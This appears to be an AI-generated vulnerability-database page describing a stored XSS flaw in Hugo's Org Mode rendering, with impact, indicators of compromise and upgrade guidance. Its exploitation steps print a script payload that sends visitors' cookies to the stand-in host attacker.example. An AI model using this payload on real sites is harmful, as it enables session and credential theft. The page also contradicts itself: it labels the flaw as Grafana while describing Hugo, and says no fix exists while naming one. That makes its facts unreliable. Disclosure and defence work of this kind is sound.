Vulnerability DatabaseCVE-2026-100694

CVE-2026-100694: 
Grafana vulnerability analysis and mitigation

Overview

CVE-2026-100694 is a stored Cross-Site Scripting (XSS) vulnerability in Hugo, a popular open-source static site generator. Affecting versions v0.56.0 through v0.165.x, the flaw allows attackers who can supply or influence content files mapped to the text/org media type to inject arbitrary HTML and scripts into generated pages. The vulnerability was published on September 26, 2026, with a fix released in v0.166.0. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory, Hugo Security Advisory).

Technical details

The root cause is improper neutralization of input during web page generation (CWE-79). Hugo's rendering pipeline for the text/org media type (Org Mode content) passes raw HTML through without escaping: specifically, Org export blocks (e.g., #+BEGIN_EXPORT html ... #+END_EXPORT) and inline @@html:...@@ snippets are rendered verbatim into the generated HTML output. An attacker who can write to or influence any content file under /content, or control the output of a content adapter that produces text/org-typed content, can embed malicious <script> tags or event handlers that execute in site visitors' browsers. The attack vector is network-based, requires no privileges, and only requires user interaction in the form of a visitor loading the affected page (GitHub Advisory, Hugo Security Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of visitors to affected Hugo-generated pages, enabling session hijacking, credential theft, phishing, or defacement of the site's content as rendered in the browser. The impact is limited to the subsequent (browser) system — confidentiality and integrity of visitor sessions are at risk, while the Hugo server itself is not directly compromised. Only pages sourced from text/org content files or content adapters producing that media type are affected; sites that fully trust all content contributors are not impacted (GitHub Advisory, Hugo Security Advisory).

Exploitability

As of the disclosure date, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (GitHub Advisory). The EPSS score is 0.0, indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires the ability to supply or modify text/org content files or content adapter output, which limits the attack surface to scenarios involving untrusted content contributors or compromised content pipelines.

Exploitation steps

  1. Identify a target Hugo site: Determine whether the target site uses Hugo versions v0.56.0–v0.165.x and accepts or renders Org Mode (.org) content files.
  2. Gain content write access: Obtain the ability to submit or modify a content file under the /content directory (e.g., via a CMS, pull request, or compromised content adapter) that will be mapped to the text/org media type.
  3. Inject malicious HTML payload: Insert a raw HTML export block or inline snippet into the Org Mode file, such as:
    #+BEGIN_EXPORT html
    <script>document.location='https://attacker.example/steal?c='+document.cookie</script>
    #+END_EXPORT
    or using the inline form: @@html:<script>alert(1)</script>@@
  4. Trigger site build: Cause Hugo to rebuild the site (e.g., by committing the file to a repository with CI/CD, or triggering a manual build), which renders the malicious HTML unescaped into the generated static page.
  5. Deliver to victims: When site visitors load the affected page, the injected script executes in their browsers, enabling session theft, credential harvesting, or further attacks (Hugo Security Advisory, GitHub Advisory).

Indicators of compromise

  • File System: Presence of #+BEGIN_EXPORT html blocks or @@html:...@@ snippets containing <script> tags, event handlers (e.g., onerror, onload), or external URL references in .org content files under the /content directory.
  • Generated Output: Unescaped <script> tags or inline JavaScript in Hugo-generated HTML pages corresponding to Org Mode source files; inspect built HTML for unexpected script inclusions.
  • Logs: Unexpected modifications to .org content files in version control history (e.g., git log showing additions of HTML export blocks); CI/CD build logs showing new or modified Org Mode files introduced by unfamiliar contributors.
  • Network: Outbound requests from visitor browsers to unknown or attacker-controlled domains (e.g., cookie-stealing endpoints) originating from pages served by the Hugo site.

Mitigation and workarounds

Upgrade Hugo to v0.166.0 or later, which introduces a security.allowContent allowlist that denies text/org content by default, preventing unescaped HTML rendering. Sites that intentionally use Org Mode content can opt back in by adding [security] allowContent = ['.*'] to their Hugo configuration after carefully auditing all content sources. As an interim workaround for sites that cannot upgrade immediately, restrict write access to content files and content adapters to fully trusted contributors only, and avoid ingesting Org Mode content from untrusted or external sources (Hugo Security Advisory, GitHub Advisory).

Community reactions

The vulnerability was credited to researcher philipdissert as the finder, as noted in the Hugo security advisory. The Hugo maintainer (bep) published the advisory on September 9, 2026, with the CVE formally assigned and published on September 26, 2026. No significant broader media coverage or notable social media discussion has been identified at this time (Hugo Security Advisory).

Additional resources

Linux Distribution fix status

Fix availability across major Linux distributions and their releases.

Debian

Fixed

bookworm

hugo

Affected

sid

hugo: 0.166.0-1

Fixed

trixie

hugo

Affected

RHEL / CentOS

Affected

RHEL 10

grafana.src

Affected

Source: This report was generated using AI

Related Grafana vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-100700HIGH8.7
  • Grafana logoGrafana
  • node-nodemailer
NoYesSep 26, 2026
CVE-2026-100702HIGH8.2
  • Grafana logoGrafana
  • node-nodemailer
NoYesSep 26, 2026
CVE-2026-100699MEDIUM6.9
  • Grafana logoGrafana
  • node-nodemailer
NoYesSep 26, 2026
CVE-2026-100701MEDIUM6
  • Grafana logoGrafana
  • grafana.src
NoYesSep 26, 2026
CVE-2026-100694MEDIUM5.1
  • Grafana logoGrafana
  • hugo
NoNoSep 26, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management